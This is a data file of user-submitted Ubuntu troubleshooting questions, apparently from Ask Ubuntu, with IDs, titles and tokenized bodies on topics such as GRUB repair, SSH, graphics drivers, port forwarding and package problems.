320018	frostwire does not start	i downloaded frostwire from this page . after downloading , it appeared in the software center and supposedly installed it . the problem is simple : frostwire does not open , the icon blinks but nothing happens . i have read it may be a wrong version of openjdk , i have openjdk java 7 ; but i do not know how to change that .
320022	what is wrong with my gnome-3 ?	i have gnome 3 installed . it looks like this : but i want it to look like this : is n't it supposed to anyway ? additional information : i am using ubuntu 12.04 lts . i installed gnome using apt-get install command from the terminal . also : please help me !
320026	how can i set the default view per folder in nautilus , thunar , and pcmanfm ?	i know of the default setting in nautilus to set the default view , but that sets it for all directories . what i 'm looking for is to set the `` list view '' for specific folders , but nautilus does not seem to remember my settings when i change it for a folder . current behavior : the current default view is set to icon view . if i open nautilus , go into a directory , say documents , and change it to list view , it changes successfully . subsequently , everything in this nautilus session also changes to list view , so if i go back to my home folder and any other folder , they 're also in list view . now , if i close and reopen nautilus , everything is set back to icon view , even the documents folder . what i 've tried i 've tried deleting all the files under the directory ~/.local/share/gvfs-metadata mentioned in this answer , but it did n't seem to do anything . my current setup is that /home is on a separate partition , while the subfolders ( documents , downloads , etc ... ) are symlinked to an ntfs partition . i thought that might be the issue , but the same thing happens if i try what i mentioned above on a folder directly under /home/ . this question is similar , but it does n't help . i 've tried installing the thunar file manager , but it also has the same issue . i 've tried installing the pcmanfm file manager , but it also has the same issue . is this the default , normal behavior of nautilus ? or is this a bug ? alaa @ aa-lu : ~ $ nautilus -- version gnome nautilus 3.6.3 alaa @ aa-lu : ~ $ lsb_release -d description : ubuntu 13.04
320033	help with ssh between machines on local network	i have two machines on my local network ( both with ubuntu 10.04 ) and i want to ssh ( and rsync ) between them . the two machines have fixed ips 192.168.0.15 and ... 17 both computers frequently ssh successfully to external computers , but it seems much harder to do this internally . the command ssh 192.168.0.15 repeatedly gives : ssh : connect to host 192.168.0.15 port 22 : connection refused . i have spent several hours trying to fix this . is it just a firewall problem ? i have tried : sudo ufw allow proto tcp from 192.168.0.17 to any port 22 and various things with gufw allowing all traffic on port 22 but to no avail . do i need to reboot after changing the firewall ? what am i missing ? do i need to change the firewall on the outgoing computer too ?
320039	have ubuntu 12.04 want to instal 13.04	i have 12.04 installed , want to instal 13.04 , will it just overwrite 12.04 or do i need to uninstal 12.04 . will my files , and other downloads still be accessable ?
320040	difference between transmission-daemon and service transmission-daemon	i made this question so as to make myself clear some things about linux , since i 'm relatively new . i have and ubuntu server machine , which i access via ssh . i want to use it to handle my torrents from any device and have them stored somewhere steadily . today i did the first step and installed the transmission package , along with the daemon , cli etc . so i was testing the initial functionality , and i noticed that the command `` transmission-daemon + options '' behaved differently from the command `` service transmission-daemon + options '' , particularly the first did not accept a straight `` start '' option , for example.so in order not to confuse myself before proceeding , and since this could help me more generally , i would like to have an informative and understandable description of what i should be aware of as regards services and daemons , how they are implemented , roughly , and any information that could might help me handle the transmission daemon , in particular.i hope this is not too much , and that this question will help other newbies that have similar questions .
320042	why does `startx /usr/bin/unity` not load my desktop settings ?	i am trying to open a second x session with unity on display :1 . for this to achieve i open another terminal ( e.g . tty 6 ) with ctrl + alt +6 and login as the user whose desktop session i want to start . when i start the x session with unity as a client on display :1 , unity loads but does not adhere to my desktop settings . this is how i start the session : $ startx /usr/bin/unity -- :1 this does not work properly : startup applications do n't start . dconf settings are not read ( e.g . org.gnome.desktop.interface.text-scaling-factor ) the language of the desktop is not correct ( this user 's desktop should be english while my main user has a german desktop ) . ... maybe other stuff i did not notice . i also tried to start x with $ startx -- :1 this shows the correct desktop wallpaper but does not show anything else ( no xterm , no panels , no dash , ... ) . but ctrl + alt +t opens a decorated terminal and i can start unity . that loads unity with almost everything i need . but the language still is german . i also tried appending unity to ~/.xinitrc but that did not change anything . can someone point out my mistakes ? an optimal solution for me would be to being able to start a second unity session with startx -- :1 .
320052	fixing grub after fresh install from livecd on usb	i just reinstalled ubuntu 12.04 using a livecd mounted on a usb drive . when the usb drive is n't plugged in ... things wo n't boot . i 'm new to ubuntu , so please bear with me . after a bit of reading i see that grub needs to be fixed/ updated along with the mbr . unfortunately , i 'm not sure how to go about this . when booting with the usb stick plugged in , i get a menu that displays the different boot options and i can boot in to either ubuntu or windows 7 like i should be able to . i also have the livecd usb stick listed as the first device accessed during the boot sequence . this thread seems to have a good walkthrough but i 'm stuck on the first step . when running ls , i see : ( hd0 ) , ( hd0 , msdos6 ) , ( hd0 , msdos5 ) , ( hd0 , msdos3 ) , ( hd0 , msdos2 ) , i think . this is from memory . starting the first step with ls ( hd0 , msdos6 ) returns bad filename and ls ( hd0 , msdos5 ) etc returns error : unknown filesystem . it would seem that msdos6 is the ubuntu partition . but i ca n't access it . any suggestions would be appreciated .
320055	graphical interface ( ui ) wont load on ubuntu 12.04 after install	i have recently installed ubuntu 12.04 in virtual box . i can not get the graphical interface to load only the terminal . the terminal comes up and i login but it stays on the terminal . i have tried the startx command and that dosent work . i also am told on boot thhat my system is running in low graphics mode . iis this because i havent got the correct drivers . i have the ati radeon hd 3200 graphics . any help appreciated thanks .
320066	old versions eating up space ?	after changing from 32-bit ( because of recommendations ) to 64-bit ubuntu , upgrade ( 12.04 - > 12.10 ) did not go too well , so clean install was needed . i choose the automatic way for partitions creation ( because i have read that swap could be added manually ) . now i have ended with one partition /dev/sda1 226.3gb ( according to system monitor ) instead of 250gb . when i look it up in disk utility , i have three volumes : 247gb /dev/sda1 3.2gb extended 3.2gb swap i have deleted the old kernels from grub ( only 150mb ) , checked the logs ... so i was wondering , is this problem caused by old versions ( 12.10 32 bit and 12.10 64-bit ) still occupying disk space ?
320067	how can i make transmission stop limiting upload after downloading ?	i often use transmission to torrent at night , when i 'm sleeping and ca n't adjust settings manually . now what i 'd like to do is make it respect my upload limit while torrents are still downloading ( because an unlimited upload throttles download too much ) , but once i 'm just seeding , i want my upload speed to be unlimited - there 's no point in keeping the computer running for a measly 10 kb/s . temporary speed limits can only be set by time , so they 're only useful if i can accurately gauge when the torrents will finish downloading ( which i ca n't ) . is there a way i can do this ? thanks so much , betka
320072	deleted /usr/include by mistake	like a real idiot , i deleted my /usr/include on 13.04 , is there anyway i can retrieve this ?
320074	how would i format a usb drive to be accessible in windows and osx ?	something with my installation of windows has gone seriously wrong , so i was looking to reinstall windows 7 . however , since i do n't have an optical drive on my machine , i was attempting to make a bootable usb drive . the most preferable option would be to use the tool provided by microsoft , but of course that only works on windows . i was playing around with some alternative tools to create an install thumbdrive such as winusb and unetbootin , which involved a lot of messing around in gparted as i tried and failed to boot from the usb drive . eventually i decided to just create a windows vm in virtualbox and utilize microsoft 's own software , except now windows wo n't recognize my thumbdrive ; i 'm getting a fairly generic `` code 10 '' error when i try to inspect the drive in the device manager . i also tried using it on my mac , but it wo n't recognize the device either . ordinarily i 'd assume that i massively corrupted the drive in some capacity , but i still am able to use it without issue on ubuntu , so i 'm assuming i can still salvage it in some way ? i 've tried formatting it in fat/32 , ntfs , leaving the space unformatted , etc , but the other oses still refuse to read it . any suggestions on how i can regain access to my thumbdrive on windows and mac ?
320075	running magic the gathering online beta ?	has anyone been able to run magic the gathering online beta in linux ? the only way i have been able to do it is by running a windows virtual machine .
320077	should i record my encryption passphrase ?	i just completed an installation that i 've encrypted my home directory on , and got the dialog box inviting me to record my encryption passphrase . i do n't see any possible benefit to doing this ; if i need to recover my data from outside this ubuntu installation , i can do so by unwrapping the passphrase with my login password ( in fact , i just did this after my last installation died on me ) . on the other hand , anyone who gained access to the encryption passphrase would be able to use it to decrypt my data . is there any good reason to record the passphrase ?
320079	email alert on ssh and sftp connection	looked through other questions about email alerts on login but have 2 questions : can the alert be triggered by users connecting via sftp as well ? ( i tried this before and it only triggered an email when using ssh and not using sftp for remotely transferring ) the other answers said that an email alert wont work when the -n switch is used via ssh , is there a way around this ? thanks .
320080	lookup algorithm for finding a shell command	in my example , i am going to use the shell command `` rake '' . what is the lookup sequence ubuntu uses to find what to do when rake is invoked ? e.g . does it look for a path specified in .bash_profile , does it look some place else , etc .
320087	league of legends flickering minimap	iâve recently installed league of legends using playonlinux and have been patching up itâs performance . i still have one major issue which is that the fog of war on my minimap flickers constantly making it difficult to tell where my team has vision . anyone have ideas for what might be causing this or how i might go about finding a fix for it ? changing my swappiness to 10 from the default 60 seemed to help a little . thanks in advance , and here are my specs : wine version in pol:1.5.24-leagueoflegendsshop distribution : ubuntu distribution version : 13.04 ( 64 bit ) graphics card : radeon hd 6790 graphics card driver : proprietary
320096	after removing a folder ( apache2 i think ) i 'm having php and lamp trouble	when i go to phpmyadmin it says : the mysqli extension is missing . please check your php configuration . < a href= '' documentation.html # faqmysql '' target= '' documentation '' > < img src= '' themes/dot.gif '' title= '' documentation '' alt= '' documentation '' class= '' icon ic_b_help '' / > < /a > i also had wordpress installed it says : your php installation appears to be missing the mysql extension which is required by wordpress . so php mysql extension is not working , but it is installed . root @ john : ~ # sudo apt-get install php5-mysql reading package lists ... done building dependency tree reading state information ... done php5-mysql is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i tried to remove it and re-install it but i had problems : root @ john : ~ # sudo apt-get purge php5-mysql reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : dbconfig-common libdbd-mysql-perl libmcrypt4 mysql-client mysql-client-5.5 mysql- client-core-5.5 php5-mcrypt use 'apt-get autoremove ' to remove them . the following packages will be removed : php5-mysql* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 245 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 326631 files and directories currently installed . ) removing php5-mysql ... dpkg : error processing php5-mysql ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 processing triggers for libapache2-mod-php5 ... action 'configtest ' failed . the apache error log may have more information . your apache2 configuration is broken , so we 're not restarting it for you . errors were encountered while processing : php5-mysql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) note : everything was working fine till i removed some folder ( maybe apache2 ) then when i tried to install lamp again i have troubles .
320099	ubuntu 13.04 runs slow	yesterday i installed ubuntu 13.04 32-bit on my pc , but it runs slow . i do n't know why . i 'm a new linux user in general . hardware • processor : intel atom cpu n26000 1.60ghz x 4 • graphics card : intel express chipset says in windows . intel coportation atom processor d2xxx/n2xxx integrated graphics controller with gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) • hard disk : 313.9gb • 1 gb ram . i do not know if i should install another distribution of linux or another version of ubuntu , but i need help please . thanks . : (
320109	using avconv to convert an avi video file to mkv	i am trying to convert a movie i have from the avi format to an mkv format . i am fairly new to using avconv , but would like to use it to perform this conversion . my real problem is knowing what settings to use such as the bitrate . essentially all i want to do is change the format to allow my dvd player to play it . in windows i would normally use formatfactory , which essentially allowed me to do a drag and drop conversion with no setting changes required . i essentially am trying to do that same thing in ubuntu but with the command line .
320110	ubuntu on external hdd accessed from mac and windows	i have an external 2t hdd , an imac intel , a windows laptop and a router ( airport extreme ) . i 'd like to install ubuntu on the ext hdd and have access to it either from the imac or windows machine ( locally ) . i have read many posts here and on lifehackers about dual/triple booting in the same machine , but i want to double boot from each machine being ubuntu in the same ext hdd . is that possible ? do i just need to follow the install instructions to dual boot for each machine/os but targeting the same ext hdd ? thanks in advance .
320116	restoring modprobe configurations	while trying to fix clickpad issues , i seem to have messed up my psmouse.conf . i attempted to follow the instructions here : right mouse button doesnt work as mentioned by the answer on that post , the right-side detection was fixed , but full touchpad detection was broken and a number of more important features were broken such as scrolling . how can i restore /etc/modprobe.d/psmouse.conf to how it was on install , along with any additional files effected ?
320119	medibuntu 'bad gateway ' connection failure	i 'm attempting to make dvds playable using the community docs suggested command sudo /usr/share/doc/libdvdread4/install-css.sh . this consistently returns the following failure : -- 2013-07-14 15:29:38 -- http : //packages.medibuntu.org/dists/precise/free/binary-amd64/packages resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.101.8 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.101.8|:80 ... connected . http request sent , awaiting response ... 502 bad gateway 2013-07-14 15:30:00 error 502 : bad gateway . dynamic fetch failed ; falling back to static fetch -- 2013-07-14 15:30:00 -- http : //packages.medibuntu.org/pool/free/libd/libdvdcss/libdvdcss2_1.2.10-0.2medibuntu1_amd64.deb resolving packages.medibuntu.org ( packages.medibuntu.org ) ... 88.191.101.8 connecting to packages.medibuntu.org ( packages.medibuntu.org ) |88.191.101.8|:80 ... connected . http request sent , awaiting response ... 502 bad gateway 2013-07-14 15:30:23 error 502 : bad gateway . i took this to mean the medibuntu server might be down . this suspicion was deepened when , in attempting to visit medibuntu.org using firefox , the page would not load , instead displaying this message : response error . technical description : 502 bad gateway - response error , a bad response was received from another proxy server or the destination origin server . this also remained the same as i checked back periodically over the past two weeks . i have no problems surfing the rest of the web . but today i discovered that , if i check medibuntu.org with my android phone 's firefox , the page loads fine . yet i still can not load it on my ubuntu netbook . i 'm providing this information in case it might shed light on what is going on . my only concern right now is with being able to download the encryption library and watch dvds .
320120	daul boot between linux and windows	i have installed the 32 bit version of ubuntu while i should have installed the 64-bit version of ubuntu . i am trying to have a daul boot between windows 8 and linux . the problem comes when i am trying to run boot-repair on the 32 bit version of ubuntu and it complains by saying that i need to have a 64-bit version of ubuntu to support the efi system.when i try to download the 64 bit version on my computer , the archive manager stops and claims that there is an error , how do i work around this .
320121	simple port forwarding	i am in a bit of trouble as i am trying to setup a reverse proxy with and a second server . my idea was to get the firewall to forward https to the reverse proxy and port 29418 ( gerrit ssh ) to the second server . now my cooperate it guy says : can not ! either both ports go to server 1 or both ports go to server 2 . ok , as a work around i tried to setup a port forwarding on the reverse proxy of port 29418 - > server2:29418 details : server1 ip : 10.0.0.132 and 192.168.10.2 on ubuntu 12.04.2 lts server2 ip : 10.0.0.133 and 192.168.10.3 on ubuntu 12.04.2 lts now both https and port 29418 go from the firewall to 10.0.0.132 , it says that 's the only way . : ( so please tell me how to forward from 10.0.0.132:29418 - > 192.168.10.3:29418 or 10.0.0.133:29418 when i am working on the 10.0.0.132 i can connect to both 10.0.0.133:29418 and 192.168.10.3:29418 so the ports are open . -- update -- my iptables -t nat -l looks like this : root @ dev : /root # iptables -t nat -l chain prerouting ( policy accept ) target prot opt source destination dnat tcp -- anywhere dev.example.com tcp dpt:29418 to:10.0.0.133 chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination root @ dev : /root # cat /proc/sys/net/ipv4/ip_forward 1
320123	problem with okular ( navigation )	i 've installed okular 0.16.4 and am facing a little problem okular by default starts in navigation mode and presents you with other tools , like selection mode and such . problem is , everytime i try to change to any of those , it goes back to navigation mode ! someone know how i can solve this ?
320126	xrdp to ubuntu loads different session	when i use my pc a to log into remote desktop of the server , which runs ubuntu , run some program ( say matlab ) , close the connection and re-log into the server , the matlab still runs . however , if i use my pc b to re-log into the server , it seems a new session and no matlab window can be seen . but top shows the matlab is running . how can i log into the same session i started using pc a ?
320127	always use `-p` flag with `cd` command	how can i set -p flag to every cd command ? i do that every time . there are ls flag environment variable which i could use for ls command so i wonder can -p be set as default ?
320130	launcher and panel do not start after booting to terminal	i did a fresh install of 13.04 and i wanted to boot straight into the terminal . so in the /etc/default/grub file , i changed the line grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' text '' this worked . however , now when i login and subsequently do `` startx '' ... .i see my desktop background , but the launcher and the panel never show up . what do i need to change to be able to startx into unity when i want to start unity ? did i do something wrong or is there a better way to boot into the terminal ? any help is appreciated .
320139	nvidia issue - can not identify graphics	i realize this issue is very prevalent - but before you mark this as a duplicate - i have tried everything suggested online , and nothing works . the problem : with the nvidia quadro k1000m and ubuntu 12.04 lts x64 on my lenovo w530 , i have tried sudo apt-get install mesa-utils , i have tried looking under `` additional drivers '' ( when opened , this states , `` no proprietary drivers are in use on this system ) , i have tried manually installing the .run file from the nvidia website ( ended up with me getting into some horrible 800x600 resolution and having to edit the xorg.conf file to get out of it ) . currently , i have nvidia-settings , -common , -current installed ( which i got from synaptic ) . the screen has luckily returned to full-screen resolution . i have been using linux for 3 days only , so when i was doing all the above , i also had no clue what was actually going on . if it makes any difference , i have bumblebee installed for optimus support . running additional drivers : more info : ... : ~ $ glxinfo name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . proof that something is ( supposed to be ) there : ... : /usr/bin $ ls nv* nvidia-cuda-mps-control nvidia-detector nvidia-persistenced nvidia-cuda-mps-server nvidia-installer nvidia-settings nvidia-debugdump nvidia-modprobe nvidia-uninstall ... : /usr/bin $ nvidia-installer -- version nvidia-installer : version 319.32 ( buildmeister @ swio-display-x64-rhel04-14 ) wed jun 19 15:50:43 pdt 2013 the nvidia software installer for unix/linux . this program is used to install , upgrade and uninstall the nvidia accelerated graphics driver set for linux-x86_64 . copyright ( c ) 2003 - 2010 nvidia corporation . but no drivers found at all : ... : ~ $ jockey-text -- list ... : ~ $ like i said , i am a very new user and i would really like to be able to use ubuntu , however this problem is making me struggle .
320141	ubuntu touch for touch computers	ubuntu touch was made for mobiles , as i understand it , but would it be possible to make it work on a touch computer ? like if i get a touch computer with windows on it , i would like to install the ubuntu touch os on it instead , or anything else that would be similar . i havent't tried anything because i could n't find anything that could be installed on a computer . thanks for answering ! : )
320146	trying to undo some commands	i have done the following commands trying to make ubuntu work faster : echo 100 > /proc/sys/vm/overcommit_ratio echo 2 > /proc/sys/vm/overcommit_memory # /etc/sysctl.conf прописываем : vm.overcommit_memory=2 vm.overcommit_ratio=100 it 's become worse . i want to `` undo '' those commands . so deleted these 2 lines from /etc/sysctl.conf but i ca n't neither change no delete the first two files , it says `` permission denied '' even when i say `` sudo su '' or just `` sudo '' .
320154	how to boot ubuntu from windows 8	i had installed windows 7 ( 32 bit ) and ubuntu . it was working fine , but after that i installed windows 8 ( 64 bit ) instead of windows 7 . now i 'm unable to boot ubuntu . please help me to open my previous ubuntu and how i 'll get my data which were inside ubuntu .
320156	advice needed for running linux distro for both server and desktop purposes	my environment : pc : cpu : intel 2500k ram : corsair 16gb 1600mhz ( 4x4gb ) vga : sapphire ati 5570 1gb ddr3 2 monitors ( dell 24 '' & samsung 26 '' ) network : static ip net down/up speed : ~90mbps/30mbps my purposes : run personal websites ( ~10-50 concurrent users ) home media center ( play musics & 720p/1080p movies ) develop websites ( using phpstorm with vagrant/virtualbox ) remote control with teamviewer i have tried ubuntu desktop 13.04 but it runs quite slow to my expectation , especially with teamviewer ( clicks need ~10-30 secs to response , both pc have same network speeds ) . i am looking a distro ( the more similar to ubuntu the better as i 'm a little familiar with ubuntu ) which is fast , minimal built-in software and not so complicated to manage or install drivers . i 'm thinking of install ubuntu server 13.04 then install packages manually but i guess installing other softwares to meet my requirement ( purposes ) is quite complicated . please advice me a distro which has gui with no or minimal built-in software as i dont need office , gimp , firefox ( i prefer chrome ) , ... edited : after done a search , i am thinking of install ubuntu server then install lxde : apt-get install xorg lxde-core then i start lxde after login : startx any comments ? do i need to run only those 2 command to get gui for ubuntu server ? thanks a lot !
320158	error after installing ubuntu in windows 8	hello , i am using acer aspire 5738 . i have installed ubuntu inside windows 8 in different drive . while booting ubuntu its showing error : unknown file system load the kernel first . please help to recover from this problem.thank you for reading .
320159	can going into `` suspend '' have negative effects on applications ?	are there any negative effects to go into `` suspend mode '' wile an application is in the middle of running ? i 'm assuming applications that do n't actually `` do much '' unless interacted with ( such as a gedit or nautilus window ) would handle it fine . but i imagine applications like transmission or an active cp or mv command which are continuously reading/writing from the harddisk , or sending data over the network may not like it as much . or are these concerns unfounded ?
320162	has support for non-uefi/non-i386 been dropped ?	i attempted to install the 13.04 distribution using the amd iso , since my system uses an amd64 cpu architecture . after numerous attempts , all failing with `` grub installation failed . `` , i gave up . after doing some research i came to the conclusion that the amd iso does not work with a non-uefi . can anyone confirm this conclusion ? in the interim i will be returning to version 10.04 while i research other distributions . i really like the kubuntu distributions and i hope that there is some way of making it work . the following are the details of my system : cpu type : amd a6-3400m apu with radeon ( tm ) hdgraphics cpu speed : 1.40 ghz hdd model name : st9500325as atapi model name : hl-dt-stdvram gt32n system bios version : v1.09 vga bios version : bk-ati ver012.043.000.014.040915 fbc version : 1.07 product name : aspire 5560 manufacturer name : acer
320164	is there a paint.net equivalent on ubuntu 12.04	i have tried gimp and the tool i am looking for is not in it . i have looked into paint.mono but have no clue on how to install it . i just need an art program with a simple curve tool , where draws a curve through specified multiple points .
320169	how do i fix the menu items displayed when using openoffice ?	i wan na ask about ubuntu 12.04 lts running on my laptop . when i run openoffice , the menubar is showing ___ signs , including file , view , edit , tools etc . then i can not find the words on it . here 's how i installed openoffice : sudo add-apt-repository ppa : upubuntu-com/office sudo apt-get update sudo apt-get install openoffice please help me fix this . i already tried to install openoffice just like mitch said and the package wo n't able to be installed . then i tried to install libreoffice 4 [ link ] ( how can i install openoffice ? ) and it shows me the problems again .
320174	are btrfs updates rolled in to 12.04 lts ( 3.2 ) kernels ?	many btrfs bug fixes and updates are being applied to the 3.10 kernel by the filesystem maintainers - is ubuntu actively pushing those fixes and updates down to their current lts kernel ( 3.2.0-x ) ? specifically , if i convert to btrfs for my server infrastructure using precise , am i going to inherit all the btrfs bugs present in the 3.2 kernel , or are bug fixes and features being put inline with each `` linux-image-3.2.0-x '' kernel update ? cheers , kyle .
320182	wubi.exe does n't install ubuntu on windows 7 64 bits	downloaded wubi.exe to install ubuntu on my windows 7 64 bit os . while running , i selected a space of 50 gb on my d : drive to install ubuntu . but after downloading , it showed an error , `` image file not found '' and ubuntu was n't installed .
320184	unfortunately deleted /usr/bin/python	unfortunately i deleted the /usr/bin/python in my ubuntu 12.04 i went to /usr/bin/ and run ls -al then i got lrwxrwxrwx 1 root root 64 jul 13 14:58 python - > /library/frameworks/python.framework/versions/current/bin/python how do i link that python so that i can get python in terminal on running python i also reinstalled python by apt-get -- purge -- reinstall install python i tried adding sym link like ln -s /usr/lib/python2.7/ /usr/bin/python then it thrown in ln : failed to create symbolic link/usr/bin/python ' : file exists`
320185	replaced windows 7 with ubuntu 13.04 but wo n't boot from internal hdd	the installation went fine until i restarted . i remember enabling boot from removable disk and was thinking of disabling it as it boot up . pressed f8 nothing happened . instead it went straight to the purple ubuntu loading screen . if i try to boot without the usb , it just gives me a blank black screen with a blinking _. i am fairly new to this and i am hoping for a fix . thanks in advance .
320190	how to add/remove user accounts in ubuntu from a remote machine	how to add/remove of user accounts of a remote ubuntu machine , from a local ubuntu machine in the lan ?
320193	can not start application if not on correct path	i have the following app `` system monitor indicator '' and i want to make it start on boot up . so i am trying to find whats the name of the app to call it from the terminal , i find the `` exe '' at /usr/share/applications and the name is indicator-monitor.desktop if i try sudo /usr/share/applications/indicator-monitor it says command not found if i remove the sudo it says permission denied . however when i do cd /usr/share/applications & & sudo indicator-monitor it executes fine . if i put the above on the start up command it does n't open . any ideas ? thank you
320195	how to convert a html file to pdf ( with colors )	i have a html file that is using a style.css and has colors , ex . : < font style=background-color : red ; color=white > foo < /font > how can i `` export '' this local file on my ubuntu 12.04 to a pdf ? ( the look and color should stay the same ) . i tried ex . : ctrl+p - > print to pdf , but it did n't preserve the colours . i tried htmldoc with the -- color option.. but it 's the same problem.. it would be great to do this via the command line .
320198	remember last opened applications ubuntu 13.04	i want to save last opened applications before a restart or shut down . i activated auto save session from dconf editor , but to no avail .
320203	grub2 detects windows 8 instead of 7	i earlier had windows 7 installed on my laptop ... then installed windows 8 with dual boot setup on a different partition . then i didnt like windows 8 so much and decided it to replace with ubuntu 12.04 . so i booted into live cd and formatted my windows 8 partition to ext4 . set mountpoint as / . and installed ubuntu succesfully . then when i booted the computer . it detects the windows 8 system and not windows 7 which is actually present on my lappy . when i click on windows 8 entry in grub2 . it takes me to windows 8 repairing stuff . how can i get my system to dual boot windows 7 and ubuntu ?
320204	e : malformed line 54 in source list /etc/apt/sources.list ( dist parse )	the command sudo apt-get update returns e : malformed line 54 in source list /etc/apt/sources.list ( dist parse ) as output . please help me to solve this issue . here are lines 53 and 54 in the source list : deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse deb http : //archive.canonical.com/lucid partner
320205	how to write cloud-specific application upon ubuntu cloud infrastructure ?	say there is a ready-to-use ubuntu private cloud infrastructure using maas , juju and openstack . the next step for a newbie developer is trying to write an application upon this infrastructure as a service . but i found only small documentation about how to write charms rather than a cloud-specialized application ! as i know , charms are only about applications deployment using juju but i need to know how to write the application itself . i 'm worry about : how a cloud-application is different from a typical traditional application ? how should i enable scalability for my application in both processing and storage using other 3rd parties softwares as a services ( saas ) ? what are ubuntu 's tools , ides , sdks and etc to write a cloud-specific application ? thanks in advance !
320209	can not boot from ubuntu created usb - works on legacy hardware but not multiple windows 8 devices ( toshiba p50t , and sony duo 11 )	i have created a bootable usb using ubuntu running in a vmware vm and using the instructions as provided here http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu . i have windows 8 hardware that 'will ' boot from the usb ( sony vaio duo 11 ) . therefore , i can run boot form the usb and try ubuntu without any impact on my win 8 configuration . secure boot setting has no negative impact either way . i have another newer windows 8 pro laptop ( toshiba p50t - haswell architecture , 4th gen i7 ) and i can not boot from the usb . the hardware does identity the usb and provides it as a boot option , and the ubuntu boot menu is displayed , yet the os fails to boot . i am inclined to believe this might be 'related ' to the known usb 3.0 issues with the haswell based systems - http : //www.tomshardware.com/news/haswell-s3-sleep-problem-pcn,21896.html . the laptop in question is less than two weeks old and undoubtedly has the bug . i have booted the laptop from a fully shut down state . solutions/ information from someone better informed would be appreciated .
320210	resolution problem in 12.04 i am using i3	hello i am using i3processor3.2 speed and asus p8 h61-m lx3 r2.0 mother board , i am getting low resolution can any one please say how i can clear that problem
320218	conexant modem running under ubuntu 12.04 lts	i 've bought a usb 56k dailup-modem for using hylafax later on . the modem gets recognized by the system via lsusb as follows : bus 006 device 002 : id 0572:1329 conexant systems ( rockwell ) , inc . but it does n't seems to be mounted at /dev . do i need drivers for this one ? if so , how do i compile them ? all drivers i found were for old kernels . and i was n't able to compile them .
320221	removing win8 ubuntu dual-boot and using just ubuntu	i just bought an asus notebook . it had no os-s installed so i did the following to it . i installed win8 in uefi mode . i then added ubuntu to the mix . i installed it in uefi mode too using the guide at : http : //www.linuxbsdos.com/2012/11/05/dual-boot-windows-8-and-ubuntu-12-10-on-uefi-hardware/ i have gone as far as running boot-repair on my installed ubuntu , and have not used the easybcd part . i can now dual-boot ubuntu and win8 with no problems using grub2 . my question is the following : if i want to remove the dual-boot setup and install just ubuntu , can i use the ubuntu livecd and choose the erase disk option ? i know this will remove all my data , but that is allright . my fear is ending up with an unbootable machine . can that happen ?
320228	how to install the ubuntu server 12.04 gui in offline	is there any way to install gui on ubuntu server 12.04 in offline using any packages . is there any deb package available for install gui .
320229	trouble updating/installing	every time i try to update or install something , i get this : could not connect to mirror01.th.ifl.net:80 can somebody please explain this ? it 's really riling me
320233	suspend not working properly on macbook pro retina ( 10.1 )	i am admittedly a newbie user . i have recently got an ubuntu 13.04 install working on my rmbp ( as you can infer from the title ) and noticed that suspend does n't work . the system shuts down properly , but will not resume after reopening the lid and/or pressing keys . after some google searching i stumbled upon someone saying that the nvidia driver work with suspend . if there is in fact no solution for me to stick with my nouveau driver and suspend properly , then how may i go about installing the appropriate nvidia driver ? thank you very much in advance .
320235	after downloading , do i have to install it ? if so , how ?	my wife had ubuntu 10.10 on her lap top and i have downloaded 12.04.2 to the desktop . do i have to do anything else or does it automatically install itself ?
320236	ubuntu 12.04 upgrade - keyboard problems	i made an upgrade from 10.04 to 12.04 . it all went smooth , more or less , but at end i have the real problem - my keyboard is not working ! i tried both usb/ps2 keyboards , but it 's the same story ( mouse is working ) . so , i can type my password on login screen , and after successful login , i ca n't use my keyboard at all . what 's funny , when i change switch to guest user keyboard is working . form that guest session i can login via `` ssh -x '' with my user name and keyboard is working perfectly , both in terminal and every program i start . i tried everything i encountered on the web with `` keyboard problems in ubuntu 12.04 '' , but without any solution . i did `` upgrade '' and `` dist-upgrade '' , i also installed `` gnome '' and login into `` gnome-classic '' session , but still facing the same problems . i would be grateful to any help . thank you in advance ! best regards , aleksandar c .
320241	how do i set network sharing in xubutu 13.04 with samba installed ?	i have xubuntu 13.04 installed , i 've installed samba also and winbind , but how do i get to set sharing options for folders and or provide access to the computer as well ? i also have virtualbox installed with xp on , even xp is struggling to get access . what else can i do ? xubuntu is quite different from ubuntu 13.04 , in ubuntu 13.04 , you can for example set the sharing for individual folders with samba installed .
320245	unable to start riak	i am trying to install riak on ubuntu server 12.04 lts 64-bit on virtual box . i am following this guide . i 've completed all the steps mentioned in it . but when i do riak start , it says unable to access /var/run/riak , permission denied run script as root so i did sudo riak start and then i got a warning warning ulimit -n is 1024 . 4096 is minimum and after that the node does n't start . when i check by typing riak-admin test it says node is not running ! ! i am new to ubuntu ( actually just using it for the first time , just to install riak ) . any idea how can i start riak ? i 've already installed openssl0.9.8 and erlang .
320247	usb 3.0 does n't work after waking up from suspend	i tried a few things but my problem is still here . if i restart my pc , usb devices work well . however , after waking up from suspend , the two usb 3.0 ports do n't work but the usb 2.0 ports work well .
